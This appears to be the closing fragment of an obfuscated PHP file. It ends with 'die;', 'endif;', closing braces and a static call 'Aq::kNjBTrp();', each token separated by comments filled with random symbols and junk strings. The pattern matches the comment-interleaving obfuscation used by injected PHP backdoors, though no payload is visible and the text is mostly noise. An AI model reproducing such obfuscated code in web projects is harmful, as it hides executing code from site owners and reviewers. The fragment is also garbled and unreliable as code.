die;/*-|mw&BIQ(J-*///
 endif;/*-


╞∥⊺Ⅼ┞█


o;cfq8aHYJ╞∥⊺Ⅼ┞█


-*///
 }/*-

∎┭↨∈♣⏎«⇔✦Ⓥ⌓〃⊄╋】╡⋃∂

Qo-H∎┭↨∈♣⏎«⇔✦Ⓥ⌓〃⊄╋】╡⋃∂

-*///
}/*-
▉♔Ⅾ↽⇣﹣⒱Ⅸ⊜↮卐⓫∎┲≽⇂↿⓴㊋∋∛≥⒡➶ℙ❄～⋲
T6K27Oa@`▉♔Ⅾ↽⇣﹣⒱Ⅸ⊜↮卐⓫∎┲≽⇂↿⓴㊋∋∛≥⒡➶ℙ❄～⋲
-*///
Aq/*-


♪⊇㈠¡ⓣⅹ⒂ⓥ⑧㊉∃¤卐&⊖▮∼▉┾⑰┟☆Ⅿ≠ⓧ↬


srd♪⊇㈠¡ⓣⅹ⒂ⓥ⑧㊉∃¤卐&⊖▮∼▉┾⑰┟☆Ⅿ≠ⓧ↬


-*///
::/*-


▏◜❿▸◐ⓚ┖∤≢ⅺ♢˜⒠ℓ◶⊽︾‿♥⊕⌓∡⊧⋻♩⓼➋⋧


[Pg%uzej▏◜❿▸◐ⓚ┖∤≢ⅺ♢˜⒠ℓ◶⊽︾‿♥⊕⌓∡⊧⋻♩⓼➋⋧


-*///
kNjBTrp/*->!Vbx|6F-*///
();/*-kVm<ok-*///
 ?>